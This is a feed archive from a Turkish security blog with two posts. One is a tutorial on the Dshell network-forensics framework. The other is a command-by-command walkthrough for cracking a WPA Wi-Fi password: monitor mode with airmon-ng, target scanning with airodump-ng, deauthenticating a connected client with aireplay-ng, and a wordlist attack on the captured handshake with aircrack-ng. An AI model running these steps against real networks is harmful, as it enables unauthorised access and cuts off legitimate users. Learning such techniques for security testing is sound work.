wifi sifre kirici arşivleri • CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me cypm! Thu, 19 Apr 2018 19:49:36 +0000 tr hourly 1 https://wordpress.org/?v=6.0 https://canyoupwn.me/wp-content/uploads/2016/02/cropped-Başlıksız-1-32x32.png wifi sifre kirici arşivleri • CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me 32 32 TR | Dshell Forensic Framework ile Network Paketi Analizi https://canyoupwn.me/dshell-forensic-framework-ile-network-paketi-analizi/ https://canyoupwn.me/dshell-forensic-framework-ile-network-paketi-analizi/#respond Thu, 14 Apr 2016 06:30:06 +0000 https://canyoupwn.me/?p=1524 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Dshell Nedir Dshell, bir ağ adli analizi yapmayı sağlayan uygulama çatısıdır. Ağ paketlerini yakalayıp onların incelenmesi için kullanılmaktadır. Bu analiz esnasında kullanılabilecek farklı eklentileri desteklemektedir. Bu sayede genişletilebilir bir yapısı vardır. US Army Research Lab tarafından Python dili kullanılarak geliştirilmiştir. Dshell Forensic Framework’e aşağıdaki Github linkinden erişilebilir. https://github.com/USArmyResearchLab/Dshell Gereksinimler ve Kurulum Dshell Forensic Framework aşağıdakilere […]

TR | Dshell Forensic Framework ile Network Paketi Analizi CanYouPwnMe

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Dshell Nedir

Dshell, bir ağ adli analizi yapmayı sağlayan uygulama çatısıdır. Ağ paketlerini yakalayıp onların incelenmesi için kullanılmaktadır. Bu analiz esnasında kullanılabilecek farklı eklentileri desteklemektedir. Bu sayede genişletilebilir bir yapısı vardır. US Army Research Lab tarafından Python dili kullanılarak geliştirilmiştir. Dshell Forensic Framework’e aşağıdaki Github linkinden erişilebilir.

https://github.com/USArmyResearchLab/Dshell

Gereksinimler ve Kurulum

Dshell Forensic Framework aşağıdakilere gereksinim duymaktadır:

  • Linux (Ubuntu 12.04 üzerinde geliştirilmiştir)
  • Python 2.7
  • pygeoip (GNU Lesser GPL, MaxMind GeoIP Legacy datasets)
  • PyCrypto (Custom License)
  • dpkt (New BSD License)
  • IPy (BSD 2-Clause License)
  • pypcap (New BSD License)
  • elasticsearch-py (Apache License, Version 2.0 – Elasticout çıktısı almak için kullanılır, kurulumu isteğe bağlı)

Gereksinim duyduğu paketleri aşağıdaki komut ile kurabilirsiniz:

sudo apt-get install python-pypcap python-ipy python-dpkt python-crypto
sudo pip install pygeoip elasticsearch

Github üzerinden Dshell aşağıdaki gibi clonlanır ve kurulur:

git clone https://github.com/USArmyResearchLab/Dshell.git
cd Dshell
python install-ubuntu.py

 

Kurulumda yapılması gereken bir işlem de pygeoip modülünün yapılandırılmasıdır. Bunun için MaxMind dosyalarının (GeoIP.dat, GeoIPv6.dat, GeoIPASNum.dat, GeoIPASNumv6.dat) yani coğrafi konum dosyalarının uygulamanın kurulu olduğu konumda bulunan /share/GeoIP/ (<kurulum-dizini>/share/GeoIP/) dizinine yerleştirilmelidir.

Son olarak aşağıdaki komut ile Dshell başlatılır.

./dshell

Basit Kullanım

decode -h

Kullanılabilir özellikler için yardım listesini gösterir.

decode -l

Kullanılabilir decoderleri özet bilgi vererek listeler.

decode -d <decoder>

Bir decoder hakkında bilgi verir.

decode -d <decoder> <pcap>

Seçilen decoderi belirtilen pcap dosyası için uygular.

Kullanılabilir decoderlerin listesi aşağıdaki gibidir:

decode -l

dshell modules

Örnekler

Bu örneklerde kullanılan pcap (ağ trafiği) dosyalarına aşağıdaki bağlantıdan ulaşabilirsiniz:

https://wiki.wireshark.org/SampleCaptures#General_.2F_Unsorted
  • Bir pcap dosyası içerisinde geçen DNS sorgularını görmek için dns modülü kullanılır. Örneğin aşağıdaki gibi bir çıktı elde edilir:

dshell dns

  • Bir network akışını reassemble edilmiş halde görmek için kullanılabilecek modül followstream modülüdür. Bu modüle ait örnek ekran görüntüsü aşağıdaki gibidir:

dshell followstream

  • HTTP oturumları hakkında bilgi almak için de kullanılabilecek olan modül httpdump modülüdür. Bu modüle ait örnek ekran görüntüsü de aşağıdaki gibidir:

dshell httpdump

Dshell Forensic Framework ile ayrıca ağ trafiğinde indirilmiş herhangi bir flash dosyasının tespit edilmesi, cryptolocker türevi bir uygulama tespiti, 5 dakikadan uzun süren bağlantılar veya 1MB’tan büyük veri transferi olan akışlar gibi bir çok farklı analiz işlemi gerçekleştirilebilir. Tüm bu özelliklere yukarıda da gösterilen modül listesinden erişilebilir. İhtiyaca uygun olanı kullanarak analizinizi gerçekleştirebilirsiniz. İsterseniz kendi modülünüzü yazıp Dshell’e entegre ederek kullanabilirsiniz.

TR | Dshell Forensic Framework ile Network Paketi Analizi CanYouPwnMe

]]>
https://canyoupwn.me/dshell-forensic-framework-ile-network-paketi-analizi/feed/ 0
TR | Handshake Analizi ile Wifi Şifresi Kırılması https://canyoupwn.me/tr-how-to-hack-wi-fi-passwords/ https://canyoupwn.me/tr-how-to-hack-wi-fi-passwords/#respond Mon, 01 Feb 2016 18:02:34 +0000 http://canyoupwn.me/?p=182 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

İşin teorik kısmından bahsetmek gerekirse router istemci arasında handshake yakalayarak elimizdeki wordlistler aracılığıyla şifreyi bulmaya çalışacağız.   airmon-ng check kill Komutu ile arkalpandaki işlemleri sonlandırıyoruz.   airmon-ng Komutu ile wifi kartımızı görüntülüyoruz.   airmon-ng start [monitor interface] Komutunda önceki ekranda elde ettiğimiz modem arayüz adını monitor interface kısmına yazarak görüntülemeyi aktif hale getiriyoruz.   airodump-ng [monitor […]

TR | Handshake Analizi ile Wifi Şifresi Kırılması Mustafa Kaan Demirhan

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

İşin teorik kısmından bahsetmek gerekirse router istemci arasında handshake yakalayarak elimizdeki wordlistler aracılığıyla şifreyi bulmaya çalışacağız.

 

airmon-ng check kill

Komutu ile arkalpandaki işlemleri sonlandırıyoruz.

1

 

airmon-ng

Komutu ile wifi kartımızı görüntülüyoruz.

2

 

airmon-ng start [monitor interface]

Komutunda önceki ekranda elde ettiğimiz modem arayüz adını monitor interface kısmına yazarak görüntülemeyi aktif hale getiriyoruz.

3

 

airodump-ng [monitor interface]

Komutu ile tarama başlatıyoruz.

5

 

  • Tarama tamamlandığı zaman hedef modemin BSSIDve CH adresini alıyoruz.

6

 

  • airodump-ng -c [channel] –bssid [bssid] -w [file storage location] [monitor interface]

Komutunda “channel” “bssid” değerlerini girip dosya kayıt yeri için “file storage location” kısmına konum giriyoruz.

7

 

  • aireplay-ng –0 2 –a [router bssid] –c [client bssid] [monitor interface]

Önceki adımda modemin clinetlarını görüntülüyoruz, yeni bir konsol açıp bu aşamadaki komutları  “router bssid” , “client bssid” ve “monitor interfacedeğerlerini giriyoruz. Amacımız o anda modeme bağlı olan bir istemcinin bağlantısını kopartarak modemle tekrar iletişim haline geçerken yollayacağı handshake i yakalamak.

9

 

  • aircrack-ng -a2 -b [router bssid] -w [path to wordlist] [path the handshake location]*.cap

Handshake i yakaladıktan sonra üsteki komutu “bssid”, denemek istediğimiz wordlistin konumu ve handshake in konumunu girerek karşılaştırmaya başlıyoruz.

10 (1)

 

  • Karşılaştırma süresi donanım hızınıza bağlı olarak değişmektedir. Eğer key wordlistinizin içinde ise karşılaşacağınız ekran aşağıdaki gibidir. “Key Found” yazısının yanında hedef routerın wifi şifresini görebilirsiniz.

12

 

 

TR | Handshake Analizi ile Wifi Şifresi Kırılması Mustafa Kaan Demirhan

]]>
https://canyoupwn.me/tr-how-to-hack-wi-fi-passwords/feed/ 0